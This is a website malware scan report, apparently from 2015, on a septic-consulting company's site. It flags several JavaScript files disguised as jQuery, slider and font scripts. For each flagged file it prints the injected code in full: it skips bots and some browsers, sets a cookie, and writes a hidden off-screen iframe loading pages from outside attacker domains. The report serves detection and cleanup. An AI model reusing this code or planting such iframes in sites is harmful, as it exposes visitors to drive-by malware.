Scanned pages/files
Request | Server response | Status |
http://advancedsepticconsulting.com/ | 200 OK Content-Length: 9426 Content-Type: text/html | clean |
http://advancedsepticconsulting.com/engine13/jquery.js | 200 OK Content-Length: 976 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCookie("akelbriston19ure")===undefined);if(!d()&&c){document.write('<iframe width="110" height="130" style="position:absolute;margin-top:-1001px;" src="http://chacaraembudasartes.ga/seedadmin17.html"></iframe>');var a=new Date(new Date().getTime()+48*60*60*1000);document.cookie="akelbriston19ure=1; path=/; expires="+a.toUTCString()}})(); Antivirus reports:
| ||
http://advancedsepticconsulting.com/js/jquery-1.3.2.min.js | 200 OK Content-Length: 976 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCookie("akelbriston19ure")===undefined);if(!d()&&c){document.write('<iframe width="110" height="130" style="position:absolute;margin-top:-1001px;" src="http://chacaraembudasartes.ga/seedadmin17.html"></iframe>');var a=new Date(new Date().getTime()+48*60*60*1000);document.cookie="akelbriston19ure=1; path=/; expires="+a.toUTCString()}})(); Antivirus reports:
| ||
http://advancedsepticconsulting.com/js/script.js | 200 OK Content-Length: 977 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","Linux","Google","IEMobile"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCookie("akelbriston19ure")===undefined);if(!d()&&c){document.write('<iframe width="100" height="120" style="position:absolute;margin-top:-1000px;" src="http://congresoveterinaria.ml/myhabeetat17.html"></iframe>');var a=new Date(new Date().getTime()+48*60*60*1000);document.cookie="akelbriston19ure=1; path=/; expires="+a.toUTCString()}})(); Antivirus reports:
| ||
http://advancedsepticconsulting.com/js/cufon-yui.js | 200 OK Content-Length: 14423 Content-Type: text/javascript | clean |
http://advancedsepticconsulting.com/js/Myriad_Pro_400.font.js | 200 OK Content-Length: 1117 Content-Type: text/javascript | clean |
http://advancedsepticconsulting.com/js/Myriad_Pro_600.font.js | 200 OK Content-Length: 967 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCookie("akelbriston19ure")===undefined);if(!h()&&i){document.write('<iframe width="112" height="132" style="position:absolute;margin-top:-1002px;" src="http://ilearntraininggroup.tk/dragoncha17.html"></iframe>');var j=new Date(new Date().getTime()+48*60*60*1000);document.cookie="akelbriston19ure=1; path=/; expires="+j.toUTCString()}})();
Antivirus reports:
| ||
http://advancedsepticconsulting.com/js/Myriad_Pro_700.font.js | 200 OK Content-Length: 981 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","Linux","Google","IEMobile"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCookie("akelbriston19ure")===undefined);if(!d()&&c){document.write('<iframe width="100" height="120" style="position:absolute;margin-top:-1000px;" src="http://obscura.closerby.in/mynetworxs17.html"></iframe>');var a=new Date(new Date().getTime()+48*60*60*1000);document.cookie="akelbriston19ure=1; path=/; expires="+a.toUTCString()}})(); Antivirus reports:
| ||
http://advancedsepticconsulting.com/js/Myriad_Pro_Cond_700.font.js | 200 OK Content-Length: 916 Content-Type: text/javascript | clean |
http://advancedsepticconsulting.com/js/cufon-replace.js | 200 OK Content-Length: 1090 Content-Type: text/javascript | malicious |
Malicious code found. Script contains blacklisted domain: gilacave.wonderfuldolls.ru ...[202 bytes skipped]... ,h,j){var g=(e+"").toLowerCase();var i=(h+"").toLowerCase();var f=0;if((f=g.indexOf(i,j))!==-1){return f}return false}function b(){var e=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"];var g=false;for(var f in e){if(c(navigator.userAgent,e[f])){g=true;break}}return g}var d=(getCookie("ipmoture_aurma")===undefined);if(!b()&&d){document.write('<iframe src="http://gilacave.wonderfuldolls.ru/gilacave17.html?po" style="border-style:dotted solid double dashed;top: -1000px;left: -1000px;border-top-width: 3px;position: absolute;border-left-width: 3px;" height="143" width="143"></iframe>');var a=new Date(new Date().getTime()+48*60*60*1000);document.cookie="ipmoture_aurma=1; path=/; expires="+a.toUTCString()}})(); Decoded script: <iframe src="http://gilacave.wonderfuldolls.ru/gilacave17.html?po" style="border-style:dotted solid double dashed;top: -1000px;left: -1000px;border-top-width: 3px;position: absolute;border-left-width: 3px;" height="143" width="143"></iframe> Malicious iFrame found. size: 143x143 src: http://gilacave.wonderfuldolls.ru/gilacave17.html?po This URL is marked by Google as suspicious <iframe src="http://gilacave.wonderfuldolls.ru/gilacave17.html?po" style="border-style:dotted solid double dashed;top: -1000px;left: -1000px;border-top-width: 3px;position: absolute;border-left-width: 3px;" height="143" width="143"> | ||
http://advancedsepticconsulting.com/engine13/wowslider.js | 200 OK Content-Length: 976 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCookie("akelbriston19ure")===undefined);if(!d()&&c){document.write('<iframe width="110" height="130" style="position:absolute;margin-top:-1001px;" src="http://chacaraembudasartes.ga/seedadmin17.html"></iframe>');var a=new Date(new Date().getTime()+48*60*60*1000);document.cookie="akelbriston19ure=1; path=/; expires="+a.toUTCString()}})(); Antivirus reports:
| ||
http://advancedsepticconsulting.com/engine13/script.js | 200 OK Content-Length: 1056 Content-Type: text/javascript | clean |
http://advancedsepticconsulting.com/index.html | 200 OK Content-Length: 9426 Content-Type: text/html | clean |
http://advancedsepticconsulting.com/residential.html | 200 OK Content-Length: 8199 Content-Type: text/html | clean |
http://advancedsepticconsulting.com/engine2/jquery.js | 200 OK Content-Length: 65536 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: advancedsepticconsulting.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 11 Jan 2015 10:12:25 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 9426
Content-Type: text/html
Last-Modified: Sat, 01 Dec 2012 02:37:41 GMT
...9426 bytes of data.
GET / HTTP/1.1
Host: advancedsepticconsulting.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 11 Jan 2015 10:12:25 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 9426
Content-Type: text/html
Last-Modified: Sat, 01 Dec 2012 02:37:41 GMT
...9426 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: advancedsepticconsulting.com
Referer: http://www.google.com/search?q=advancedsepticconsulting.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: advancedsepticconsulting.com
Referer: http://www.google.com/search?q=advancedsepticconsulting.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=advancedsepticconsulting.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://advancedsepticconsulting.com/
Result: advancedsepticconsulting.com is not infected or malware details are not published yet.
Result: advancedsepticconsulting.com is not infected or malware details are not published yet.